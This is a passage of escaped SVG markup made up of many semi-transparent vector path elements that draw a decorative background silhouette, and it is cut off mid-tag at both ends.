d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path 